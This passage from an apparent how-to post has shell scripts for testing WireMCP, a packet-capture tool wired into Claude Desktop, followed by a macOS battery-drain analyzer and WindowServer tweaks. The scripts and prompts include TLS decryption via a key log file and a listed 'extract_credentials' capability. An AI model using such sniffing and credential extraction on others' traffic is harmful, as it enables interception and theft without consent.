if [[ ! -f "$HOME/Library/Application Support/Claude/claude_desktop_config.json" ]]; then
    echo "   ⚠ Claude Desktop config not found"
fi

echo -e "   ${GREEN}✓${NC} All prerequisites met"
echo ""

# Detect Zscaler
echo -e "${BLUE}[2/4]${NC} Detecting network configuration..."

ZSCALER_IF=""
for iface in $(ifconfig -l | grep -o 'utun[0-9]*'); do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_IF="$iface"
        echo -e "   ${GREEN}✓${NC} Zscaler tunnel: $iface ($IP)"
        break
    fi
done

if [[ -z "$ZSCALER_IF" ]]; then
    echo "   ⚠ No Zscaler tunnel detected (will use en0)"
    ZSCALER_IF="en0"
fi

echo ""

# Generate test traffic
echo -e "${BLUE}[3/4]${NC} Generating test network traffic..."

# Background network requests
(curl -s https://api.github.com/zen > /dev/null 2>&1) &
(curl -s https://httpbin.org/get > /dev/null 2>&1) &
(curl -s https://www.google.com > /dev/null 2>&1) &
(ping -c 3 8.8.8.8 > /dev/null 2>&1) &

sleep 2
echo -e "   ${GREEN}✓${NC} Test traffic generated (GitHub, httpbin, Google, DNS)"
echo ""

# Show test prompts
echo -e "${BLUE}[4/4]${NC} Test prompts for Claude Desktop"
echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}📋 Copy these prompts into Claude Desktop:${NC}"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 1: Basic Connection Test"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Can you see the WireMCP tools? List all available network analysis capabilities you have access to.
EOF
echo ""
echo "Expected: Claude should list 7 tools (capture_packets, get_summary_stats, etc.)"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 2: Simple Packet Capture"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 20 network packets and show me a summary including:
- Source and destination IPs
- Protocols used
- Port numbers
- Any interesting patterns
EOF
echo ""
echo "Expected: Packets from $ZSCALER_IF with IPs in 100.64.x.x range"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 3: Protocol Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 50 packets and show me:
1. Protocol breakdown (TCP, UDP, DNS, HTTP, TLS)
2. Which protocol is most common
3. Protocol hierarchy statistics
EOF
echo ""
echo "Expected: Protocol percentages and hierarchy tree"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 4: Connection Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 100 packets and show me network conversations:
- Top 5 source/destination pairs
- Number of packets per conversation
- Bytes transferred
EOF
echo ""
echo "Expected: Conversation statistics with packet/byte counts"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 5: Threat Detection"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture traffic for 30 seconds and check all destination IPs against threat databases. Tell me if any malicious IPs are detected.
EOF
echo ""
echo "Expected: List of IPs and threat check results (should show 'No threats')"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 6: HTTPS Decryption (Advanced)"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "⚠️  First: Restart your browser after running this:"
echo "    source ~/.zshrc && echo \$SSLKEYLOGFILE"
echo ""
cat << 'EOF'
Capture 30 packets while I browse some HTTPS websites. Can you see any HTTP hostnames or request URIs from the HTTPS traffic?
EOF
echo ""
echo "Expected: If SSL keys are logged, Claude sees decrypted HTTP data"
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}🔧 Manual Verification Commands:${NC}"
echo ""
echo "  # Test manual capture:"
echo "  sudo tshark -i $ZSCALER_IF -c 10"
echo ""
echo "  # Check SSL keylog:"
echo "  ls -lh ~/.wireshark-sslkeys.log"
echo ""
echo "  # Test WireMCP server:"
echo "  cd ~/WireMCP && timeout 3 node index.js"
echo ""
echo "  # Check Claude config:"
echo "  cat \"\$HOME/Library/Application Support/Claude/claude_desktop_config.json\""
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${GREEN}✅ Test setup complete!${NC}"
echo ""
echo "Next steps:"
echo "  1. Open Claude Desktop"
echo "  2. Copy/paste the test prompts above"
echo "  3. Verify Claude can access WireMCP tools"
echo "  4. Check ~/WIREMCP_TESTING_EXAMPLES.md for more examples"
echo ""

# Keep generating traffic in background
echo "Keeping test traffic active for 2 minutes..."
echo "(You can Ctrl+C to stop)"
echo ""

# Generate continuous light traffic
for i in {1..24}; do
    (curl -s https://httpbin.org/delay/1 > /dev/null 2>&1) &
    sleep 5
done

echo ""
echo "Traffic generation complete!"
echo ""

EOF

chmod +x ~/test_wiremcp_claude.sh

Now that you have tested everything is fine… the below just gives you a few example tests to carry out.

# Try WireMCP Right Now! 🚀

## 🎯 3-Minute Quick Start

### Step 1: Restart Claude Desktop (30 seconds)
```bash
# Kill and restart Claude
killall Claude
sleep 2
open -a Claude
```

### Step 2: Create a script to Generate Some Traffic (30 seconds)

cat > ~/network_activity_loop.sh << 'EOF'
#!/bin/bash

# Script to generate network activity for 30 seconds
# Useful for testing network capture tools

echo "Starting network activity generation for 30 seconds..."
echo "Press Ctrl+C to stop early if needed"

# Record start time
start_time=$(date +%s)
end_time=$((start_time + 30))

# Counter for requests
request_count=0

# Loop for 30 seconds
while [ $(date +%s) -lt $end_time ]; do
    # Create network activity to capture
    echo -n "Request set #$((++request_count)) at $(date +%T): "
    
    # GitHub API call
    curl -s https://api.github.com/users/octocat > /dev/null 2>&1 &
    
    # HTTPBin JSON endpoint
    curl -s https://httpbin.org/json > /dev/null 2>&1 &
    
    # IP address check
    curl -s https://ifconfig.me > /dev/null 2>&1 &
    
    # Wait for background jobs to complete
    wait
    echo "completed"
    
    # Small delay to avoid overwhelming the servers
    sleep 0.5
done

echo ""
echo "Network activity generation completed!"
echo "Total request sets sent: $request_count"
echo "Duration: 30 seconds"
EOF

chmod +x ~/network_activity_loop.sh

# Call the script
./network_activity_loop.sh 

Time to play!

Now open Claude Desktop and we can run a few tests…

  1. Ask Claude:

Can you see the WireMCP tools? List all available network analysis capabilities.

Claude should list 7 tools:
– capture_packets
– get_summary_stats
– get_conversations
– check_threats
– check_ip_threats
– analyze_pcap
– extract_credentials

2. Ask Claude:

Capture 20 network packets and tell me:
– What IPs am I talking to?
– What protocols are being used?
– Anything interesting?

3. In terminal run:

```bash
curl -v https://api.github.com/users/octocat
```

Ask Claude:

I just called api.github.com. Can you capture my network traffic
for 10 seconds and tell me:
1. What IP did GitHub resolve to?
2. How long did the connection take?
3. Were there any errors?

4. Ask Claude:

Monitor my network for 30 seconds and show me:
– Top 5 destinations by packet count
– What services/companies am I connecting to?
– Any unexpected connections?

5. Developer Debugging Examples – Debug Slow API. Ask Claude:

I’m calling myapi.company.com and it feels slow.
Capture traffic for 30 seconds while I make a request and tell me:
– Where is the latency coming from?
– DNS, TCP handshake, TLS, or server response?
– Any retransmissions?

6. Developer Debugging Examples – Debug Connection Timeout. Ask Claude:

I’m getting timeouts to db.example.com:5432.
Capture for 30 seconds and tell me:
1. Is DNS resolving?
2. Are SYN packets being sent?
3. Do I get SYN-ACK back?
4. Any firewall blocking?

7. TLS Handshake failures (often happen with zero trust networks and cert pinning). Ask Claude:

Monitor my network for 2 mins and look for abnormal TLS handshakes, in particular shortlived TLS handshakes, which can occur due to cert pinning issues.

8. Check for Threats. Ask Claude:

Monitor my network for 60 seconds and check all destination
IPs against threat databases. Tell me if anything suspicious.

9. Monitor Background Apps. Ask Claude:

Capture traffic for 30 seconds while I’m idle.
What apps are calling home without me knowing? Only get conversation statistics to show the key connections and the amount of traffic through each. Show any failed traffic or unusual traffic patterns

10. VPN Testing. Ask Claude:

Capture packets for 60 seconds, during which time i will enable my VPN. Compare the difference and see if you can see exactly when my VPN was enabled.

11. Audit traffic. Ask Claude:

Monitor for 5 minutes and tell me:
– Which service used most bandwidth?
– Any large file transfers?
– Unexpected data usage?

12. Looking for specific protocols. Ask Claude:

Monitor my traffic for 30 seconds and see if you can spot any traffic using QUIC and give me statistics on it.

(then go open a youtube website)

13. DNS Queries. Ask Claude:

As a network troubleshooter, analyze all DNS queries for 30 seconds and provide potential causes for any errors. Show me detailed metrics on any calls, especially failed calls or unusual DNS patterns (like NXDOMAIN, PTR or TXT calls)

14. Certificate Issues. Ask Claude:

Capture TLS handshakes for the next minute and show me the certificate chain. Look out for failed/short live TLS sessions

What Makes This Powerful?

The tradition way used to be:

“`bash
sudo tcpdump -i utun5 -w capture.pcap
# Wait…
# Stop capture
# Open Wireshark
# Apply filters
# Analyze packets manually
# Figure out what it means
“`
Time: 10-30 minutes!

With WireMCP + Claude:


“Capture my network traffic and tell me
what’s happening in plain English”

Time: 30 seconds

Claude automatically:
– Captures on correct interface (utun5)
– Filters relevant packets
– Analyzes protocols
– Identifies issues
– Explains in human language
– Provides recommendations

Macbook: A script to figure out which processes are causing battery usuage/drain issues (even when the laptop lid is closed)

If you’re trying to figure out whats draining your macbook, even when the lid is closed – then try the script below (call with “sudo ./battery_drain_analyzer.sh”):

cat > ~/battery_drain_analyzer.sh << 'EOF'
#!/bin/bash

# Battery Drain Analyzer for macOS
# This script analyzes processes and settings that affect battery life,
# especially when the laptop lid is closed.

# Colors for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Output file
REPORT_FILE="battery_drain_report_$(date +%Y%m%d_%H%M%S).md"
TEMP_DIR=$(mktemp -d)

echo -e "${GREEN}Battery Drain Analyzer${NC}"
echo "Collecting system information..."
echo "This may take a minute and will require administrator privileges for some checks."
echo ""

# Function to check if running with sudo
check_sudo() {
    if [[ $EUID -ne 0 ]]; then
        echo -e "${YELLOW}Some metrics require sudo access. Re-running with sudo...${NC}"
        sudo "$0" "$@"
        exit $?
    fi
}

# Start the report
cat > "$REPORT_FILE" << EOF
# Battery Drain Analysis Report
**Generated:** $(date '+%Y-%m-%d %H:%M:%S %Z')  
**System:** $(sysctl -n hw.model)  
**macOS Version:** $(sw_vers -productVersion)  
**Uptime:** $(uptime | sed 's/.*up //' | sed 's/,.*//')

---

## Executive Summary
This report analyzes processes and settings that consume battery power, particularly when the laptop lid is closed.

EOF

# 1. Check current power assertions
echo "Checking power assertions..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Current Power State

### Active Power Assertions
Power assertions prevent your Mac from sleeping. Here's what's currently active:

\`\`\`
EOF
pmset -g assertions | grep -A 20 "Listed by owning process:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 2. Check sleep prevention
SLEEP_STATUS=$(pmset -g | grep "sleep" | head -1)
if [[ $SLEEP_STATUS == *"sleep prevented"* ]]; then
    echo "" >> "$REPORT_FILE"
    echo "⚠️ **WARNING:** Sleep is currently being prevented!" >> "$REPORT_FILE"
fi

# 3. Analyze power settings
echo "Analyzing power settings..."
cat >> "$REPORT_FILE" << EOF

## ⚙️ Power Management Settings

### Current Power Profile
\`\`\`
EOF
pmset -g >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# Identify problematic settings
cat >> "$REPORT_FILE" << EOF

### Problematic Settings for Battery Life
EOF

POWERNAP=$(pmset -g | grep "powernap" | awk '{print $2}')
TCPKEEPALIVE=$(pmset -g | grep "tcpkeepalive" | awk '{print $2}')
WOMP=$(pmset -g | grep "womp" | awk '{print $2}')
STANDBY=$(pmset -g | grep "standby" | awk '{print $2}')

if [[ "$POWERNAP" == "1" ]]; then
    echo "- ❌ **Power Nap is ENABLED** - Allows Mac to wake for updates (HIGH battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Power Nap is disabled" >> "$REPORT_FILE"
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    echo "- ⚠️ **TCP Keep-Alive is ENABLED** - Maintains network connections during sleep (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ TCP Keep-Alive is disabled" >> "$REPORT_FILE"
fi

if [[ "$WOMP" == "1" ]]; then
    echo "- ⚠️ **Wake on LAN is ENABLED** - Allows network wake (MEDIUM battery drain)" >> "$REPORT_FILE"
else
    echo "- ✅ Wake on LAN is disabled" >> "$REPORT_FILE"
fi

# 4. Collect CPU usage data
echo "Collecting CPU usage data..."
cat >> "$REPORT_FILE" << EOF

## 📊 Top Battery-Draining Processes

### Current CPU Usage (Higher CPU = More Battery Drain)
EOF

# Get top processes by CPU
top -l 2 -n 20 -o cpu -stats pid,command,cpu,mem,purg,user | tail -n 21 > "$TEMP_DIR/top_output.txt"

# Parse and format top output
echo "| PID | Process | CPU % | Memory | User |" >> "$REPORT_FILE"
echo "|-----|---------|-------|--------|------|" >> "$REPORT_FILE"
tail -n 20 "$TEMP_DIR/top_output.txt" | while read line; do
    if [[ ! -z "$line" ]] && [[ "$line" != *"PID"* ]]; then
        PID=$(echo "$line" | awk '{print $1}')
        PROCESS=$(echo "$line" | awk '{print $2}' | cut -c1-30)
        CPU=$(echo "$line" | awk '{print $3}')
        MEM=$(echo "$line" | awk '{print $4}')
        USER=$(echo "$line" | awk '{print $NF}')
        
        # Highlight high CPU processes
        # Use awk for floating point comparison to avoid bc dependency
        if awk "BEGIN {exit !($CPU > 10.0)}" 2>/dev/null; then
            echo "| $PID | **$PROCESS** | **$CPU** | $MEM | $USER |" >> "$REPORT_FILE"
        else
            echo "| $PID | $PROCESS | $CPU | $MEM | $USER |" >> "$REPORT_FILE"
        fi
    fi
done

# 5. Check for power metrics (if available with sudo)
if [[ $EUID -eq 0 ]]; then
    echo "Collecting detailed power metrics..."
    cat >> "$REPORT_FILE" << EOF

### Detailed Power Consumption Analysis
EOF
    
    # Run powermetrics for 2 seconds
    powermetrics --samplers tasks --show-process-energy -i 2000 -n 1 2>/dev/null > "$TEMP_DIR/powermetrics.txt"
    
    if [[ -s "$TEMP_DIR/powermetrics.txt" ]]; then
        echo '```' >> "$REPORT_FILE"
        grep -A 30 -F "*** Running tasks ***" "$TEMP_DIR/powermetrics.txt" | head -35 >> "$REPORT_FILE"
        echo '```' >> "$REPORT_FILE"
    fi
fi

# 6. Check wake reasons
echo "Analyzing wake patterns..."
cat >> "$REPORT_FILE" << EOF

## 💤 Sleep/Wake Analysis

### Recent Wake Events
These events show why your Mac woke from sleep:

\`\`\`
EOF
pmset -g log | grep -E "Wake from|DarkWake|Notification" | tail -10 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 7. Check scheduled wake events
cat >> "$REPORT_FILE" << EOF

### Scheduled Wake Requests
These are processes that have requested to wake your Mac:

\`\`\`
EOF
pmset -g log | grep "Wake Requests" | tail -5 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 8. Background services analysis
echo "Analyzing background services..."
cat >> "$REPORT_FILE" << EOF

## 🔄 Background Services Analysis

### Potentially Problematic Services
EOF

# Check for common battery-draining services
SERVICES_TO_CHECK=(
    "Spotlight:mds_stores"
    "Time Machine:backupd"
    "Photos:photoanalysisd"
    "iCloud:bird"
    "CrowdStrike:falcon"
    "Dropbox:Dropbox"
    "Google Drive:Google Drive"
    "OneDrive:OneDrive"
    "Creative Cloud:Creative Cloud"
    "Docker:com.docker"
    "Parallels:prl_"
    "VMware:vmware"
    "Spotify:Spotify"
    "Slack:Slack"
    "Microsoft Teams:Teams"
    "Zoom:zoom.us"
    "Chrome:Google Chrome"
    "Edge:Microsoft Edge"
)

echo "| Service | Status | Impact |" >> "$REPORT_FILE"
echo "|---------|--------|--------|" >> "$REPORT_FILE"

for service in "${SERVICES_TO_CHECK[@]}"; do
    IFS=':' read -r display_name process_name <<< "$service"
    # Use pgrep with fixed string matching to avoid regex issues
    if pgrep -qfi "$process_name" 2>/dev/null; then
        # Get CPU usage for this process (escape special characters)
        escaped_name=$(printf '%s\n' "$process_name" | sed 's/[[\.*^$()+?{|]/\\&/g')
        CPU_USAGE=$(ps aux | grep -i "$escaped_name" | grep -v grep | awk '{sum+=$3} END {print sum}')
        if [[ -z "$CPU_USAGE" ]]; then
            CPU_USAGE="0"
        fi
        
        # Determine impact level
        # Use awk for floating point comparison
        if awk "BEGIN {exit !($CPU_USAGE > 20.0)}" 2>/dev/null; then
            IMPACT="HIGH ⚠️"
        elif awk "BEGIN {exit !($CPU_USAGE > 5.0)}" 2>/dev/null; then
            IMPACT="MEDIUM"
        else
            IMPACT="LOW"
        fi
        
        echo "| $display_name | Running (${CPU_USAGE}% CPU) | $IMPACT |" >> "$REPORT_FILE"
    fi
done

# 9. Battery health check
echo "Checking battery health..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Battery Health Status

\`\`\`
EOF
system_profiler SPPowerDataType | grep -A 20 "Battery Information:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 10. Recommendations
cat >> "$REPORT_FILE" << EOF

## 💡 Recommendations

### Immediate Actions to Improve Battery Life

#### Critical (Do These First):
EOF

# Generate recommendations based on findings
if [[ "$POWERNAP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
1. **Disable Power Nap**
   \`\`\`bash
   sudo pmset -a powernap 0
   \`\`\`
EOF
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
2. **Disable TCP Keep-Alive**
   \`\`\`bash
   sudo pmset -a tcpkeepalive 0
   \`\`\`
EOF
fi

if [[ "$WOMP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
3. **Disable Wake for Network Access**
   \`\`\`bash
   sudo pmset -a womp 0
   \`\`\`
EOF
fi

cat >> "$REPORT_FILE" << EOF

#### Additional Optimizations:
4. **Reduce Display Sleep Time**
   \`\`\`bash
   sudo pmset -a displaysleep 5
   \`\`\`

5. **Enable Automatic Graphics Switching** (if available)
   \`\`\`bash
   sudo pmset -a gpuswitch 2
   \`\`\`

6. **Set Faster Standby Delay**
   \`\`\`bash
   sudo pmset -a standbydelay 1800  # 30 minutes
   \`\`\`

### Process-Specific Recommendations:
EOF

# Check for specific high-drain processes and provide detailed solutions
if pgrep -q "mds_stores" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 🔍 **Spotlight Indexing Detected**
**Problem:** Spotlight is actively indexing your drive, consuming significant CPU and battery.
**Solutions:**
- **Temporary pause:** \`sudo mdutil -a -i off\` (re-enable with \`on\`)
- **Check indexing status:** \`mdutil -s /\`
- **Rebuild index if stuck:** \`sudo mdutil -E /\`
- **Exclude folders:** System Settings > Siri & Spotlight > Spotlight Privacy

EOF
fi

if pgrep -q "backupd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 💾 **Time Machine Backup Running**
**Problem:** Active backup consuming resources.
**Solutions:**
- **Skip current backup:** Click Time Machine icon > Skip This Backup
- **Schedule for AC power:** \`sudo defaults write /Library/Preferences/com.apple.TimeMachine RequiresACPower -bool true\`
- **Reduce backup frequency:** Use TimeMachineEditor app
- **Check backup size:** \`tmutil listbackups | tail -1 | xargs tmutil calculatedrift\`

EOF
fi

if pgrep -q "photoanalysisd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 📸 **Photos Library Analysis Active**
**Problem:** Photos app analyzing images for faces, objects, and scenes.
**Solutions:**
- **Pause temporarily:** Quit Photos app completely
- **Disable features:** Photos > Settings > uncheck "Enable Machine Learning"
- **Process overnight:** Leave Mac plugged in overnight to complete
- **Check progress:** Activity Monitor > Search "photo"

EOF
fi

# Check for additional common issues
if pgrep -q "kernel_task" 2>/dev/null && [[ $(ps aux | grep "kernel_task" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 50 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🔥 **High kernel_task CPU Usage**
**Problem:** System thermal management or driver issues.
**Solutions:**
- **Reset SMC:** Shut down > Press & hold Shift-Control-Option-Power for 10s
- **Check temperatures:** \`sudo powermetrics --samplers smc | grep temp\`
- **Disconnect peripherals:** Especially USB-C hubs and external displays
- **Update macOS:** Check for system updates
- **Safe mode test:** Restart holding Shift key

EOF
fi

if pgrep -q "WindowServer" 2>/dev/null && [[ $(ps aux | grep "WindowServer" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 30 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🖥️ **High WindowServer Usage**
**Problem:** Graphics rendering issues or display problems.
**Solutions:**
- **Reduce transparency:** System Settings > Accessibility > Display > Reduce transparency
- **Close visual apps:** Quit apps with animations or video
- **Reset display settings:** Option-click Scaled in Display settings
- **Disable display sleep prevention:** \`pmset -g assertions | grep -i display\`

EOF
fi

# 11. Battery drain score
echo "Calculating battery drain score..."
cat >> "$REPORT_FILE" << EOF

## 📈 Overall Battery Drain Score

EOF

# Calculate score (0-100, where 100 is worst)
SCORE=0
[[ "$POWERNAP" == "1" ]] && SCORE=$((SCORE + 30))
[[ "$TCPKEEPALIVE" == "1" ]] && SCORE=$((SCORE + 15))
[[ "$WOMP" == "1" ]] && SCORE=$((SCORE + 10))

# Add points for running services
pgrep -q "mds_stores" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "backupd" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "photoanalysisd" 2>/dev/null && SCORE=$((SCORE + 5))
pgrep -q "falcon" 2>/dev/null && SCORE=$((SCORE + 10))

# Determine rating
if [[ $SCORE -lt 20 ]]; then
    RATING="✅ **EXCELLENT** - Minimal battery drain expected"
elif [[ $SCORE -lt 40 ]]; then
    RATING="👍 **GOOD** - Some optimization possible"
elif [[ $SCORE -lt 60 ]]; then
    RATING="⚠️ **FAIR** - Noticeable battery drain"
else
    RATING="❌ **POOR** - Significant battery drain"
fi

cat >> "$REPORT_FILE" << EOF
**Battery Drain Score: $SCORE/100**  
**Rating: $RATING**

Higher scores indicate more battery drain. A score above 40 suggests optimization is needed.

---

## 📝 How to Use This Report

1. Review the **Executive Summary** for quick insights
2. Check **Problematic Settings** and apply recommended fixes
3. Identify high CPU processes in the **Top Battery-Draining Processes** section
4. Follow the **Recommendations** in order of priority
5. Re-run this script after making changes to measure improvement

## 🛠️ Common Battery Issues & Solutions

### 🔴 Critical Issues (Fix Immediately)

#### Sleep Prevention Issues
**Symptoms:** Mac won't sleep, battery drains with lid closed
**Diagnosis:** \`pmset -g assertions\`
**Solutions:**
- Kill preventing apps: \`pmset -g assertions | grep -i prevent\`
- Force sleep: \`pmset sleepnow\`
- Reset power management: \`sudo pmset -a restoredefaults\`

#### Runaway Processes
**Symptoms:** Fan running constantly, Mac gets hot, rapid battery drain
**Diagnosis:** \`top -o cpu\` or Activity Monitor
**Solutions:**
- Force quit: \`kill -9 [PID]\` or Activity Monitor > Force Quit
- Disable startup items: System Settings > General > Login Items
- Clean launch agents: \`ls ~/Library/LaunchAgents\`

### 🟡 Common Issues

#### Bluetooth Battery Drain
**Problem:** Bluetooth constantly searching for devices
**Solutions:**
- Reset Bluetooth module: Shift+Option click BT icon > Reset
- Remove unused devices: System Settings > Bluetooth
- Disable when not needed: \`sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState 0\`

#### Safari/Chrome High Energy Use
**Problem:** Browser tabs consuming excessive resources
**Solutions:**
- Use Safari over Chrome (more efficient on Mac)
- Install ad blockers to reduce JavaScript load
- Limit tabs: Use OneTab or similar extension
- Disable auto-play: Safari > Settings > Websites > Auto-Play

#### External Display Issues
**Problem:** Discrete GPU activation draining battery
**Solutions:**
- Use single display when on battery
- Lower resolution: System Settings > Displays
- Use clamshell mode efficiently
- Check GPU: \`pmset -g\` look for gpuswitch

#### Cloud Sync Services
**Problem:** Continuous syncing draining battery
**Solutions:**
- **iCloud:** System Settings > Apple ID > iCloud > Optimize Mac Storage
- **Dropbox:** Pause sync or use selective sync
- **OneDrive:** Pause syncing when on battery
- **Google Drive:** File Stream > Preferences > Bandwidth settings

### 🟢 Preventive Measures

#### Daily Habits
- Close apps instead of just minimizing
- Disconnect peripherals when not in use
- Use Safari for better battery life
- Enable Low Power Mode when unplugged
- Reduce screen brightness (saves 10-20% battery)

#### Weekly Maintenance
- Restart Mac weekly to clear memory
- Check Activity Monitor for unusual processes
- Update apps and macOS regularly
- Clear browser cache and cookies
- Review login items and launch agents

#### Monthly Checks
- Calibrate battery (full discharge and charge)
- Clean fans and vents for better cooling
- Review and remove unused apps
- Check storage (full drives impact performance)
- Run Disk Utility First Aid

### Quick Fix Scripts

#### 🚀 Basic Optimization (Safe)
Save and run this script to apply all recommended power optimizations:

\`\`\`bash
#!/bin/bash
# Apply all power optimizations
sudo pmset -a powernap 0
sudo pmset -a tcpkeepalive 0
sudo pmset -a womp 0
sudo pmset -a standbydelay 1800
sudo pmset -a displaysleep 5
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
echo "Power optimizations applied!"
\`\`\`

#### 💪 Aggressive Battery Saving
For maximum battery life (may affect convenience):

\`\`\`bash
#!/bin/bash
# Aggressive battery saving settings
sudo pmset -b displaysleep 2
sudo pmset -b disksleep 10
sudo pmset -b sleep 5
sudo pmset -b powernap 0
sudo pmset -b tcpkeepalive 0
sudo pmset -b womp 0
sudo pmset -b ttyskeepawake 0
sudo pmset -b gpuswitch 0  # Force integrated GPU
sudo pmset -b hibernatemode 25  # Hibernate only mode
echo "Aggressive battery settings applied!"
\`\`\`

#### 🔄 Reset to Defaults
To restore factory power settings:

\`\`\`bash
#!/bin/bash
sudo pmset -a restoredefaults
echo "Power settings restored to defaults"
\`\`\`

---

*Report generated by Battery Drain Analyzer v1.0*
EOF

# Cleanup
rm -rf "$TEMP_DIR"

# Summary
echo ""
echo -e "${GREEN}✅ Analysis Complete!${NC}"
echo "Report saved to: $REPORT_FILE"
echo ""
echo "Key findings:"
[[ "$POWERNAP" == "1" ]] && echo -e "${RED}  ❌ Power Nap is enabled (HIGH drain)${NC}"
[[ "$TCPKEEPALIVE" == "1" ]] && echo -e "${YELLOW}  ⚠️ TCP Keep-Alive is enabled (MEDIUM drain)${NC}"
[[ "$WOMP" == "1" ]] && echo -e "${YELLOW}  ⚠️ Wake on LAN is enabled (MEDIUM drain)${NC}"
echo ""
echo "To view the full report:"
echo "  cat $REPORT_FILE"
echo ""
echo "To apply all recommended fixes:"
echo "  sudo pmset -a powernap 0 tcpkeepalive 0 womp 0"

EOF

chmod +x ~/battery_drain_analyzer.sh

If you see windowServer as your top consumer then consider the following:

# 1. Restart WindowServer (logs you out!)
sudo killall -HUP WindowServer

# 2. Reduce transparency
defaults write com.apple.universalaccess reduceTransparency -bool true

# 3. Disable animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false

# 4. Reset display preferences
rm ~/Library/Preferences/com.apple.windowserver.plist

Finer grained optimisations:

#!/bin/bash

echo "🔧 Applying ALL WindowServer Optimizations for M3 MacBook Pro..."
echo "This will reduce power consumption significantly"
echo ""

# ============================================
# VISUAL EFFECTS & ANIMATIONS (30-40% reduction)
# ============================================
echo "Disabling visual effects and animations..."

# Reduce transparency and motion
defaults write com.apple.universalaccess reduceTransparency -bool true
defaults write com.apple.universalaccess reduceMotion -bool true
defaults write com.apple.Accessibility ReduceMotionEnabled -int 1

# Disable smooth scrolling and window animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSScrollAnimationEnabled -bool false
defaults write NSGlobalDomain NSScrollViewRubberbanding -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write NSGlobalDomain NSDocumentRevisionsWindowTransformAnimation -bool false
defaults write NSGlobalDomain NSToolbarFullScreenAnimationDuration -float 0
defaults write NSGlobalDomain NSBrowserColumnAnimationSpeedMultiplier -float 0

# Dock optimizations
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
defaults write com.apple.dock mineffect -string "scale"
defaults write com.apple.dock show-recents -bool false
defaults write com.apple.dock expose-animation-duration -float 0.1
defaults write com.apple.dock hide-mirror -bool true

# Mission Control optimizations
defaults write com.apple.dock expose-group-by-app -bool false
defaults write com.apple.dock mru-spaces -bool false
defaults write com.apple.dock dashboard-in-overlay -bool true

# Finder optimizations
defaults write com.apple.finder DisableAllAnimations -bool true
defaults write com.apple.finder AnimateWindowZoom -bool false
defaults write com.apple.finder AnimateInfoPanes -bool false
defaults write com.apple.finder FXEnableSlowAnimation -bool false

# Quick Look animations
defaults write -g QLPanelAnimationDuration -float 0

# Mail animations
defaults write com.apple.mail DisableReplyAnimations -bool true
defaults write com.apple.mail DisableSendAnimations -bool true

# ============================================
# M3-SPECIFIC OPTIMIZATIONS (10-15% reduction)
# ============================================
echo "Applying M3-specific optimizations..."

# Disable font smoothing (M3 handles text well without it)
defaults -currentHost write NSGlobalDomain AppleFontSmoothing -int 0
defaults write NSGlobalDomain CGFontRenderingFontSmoothingDisabled -bool true

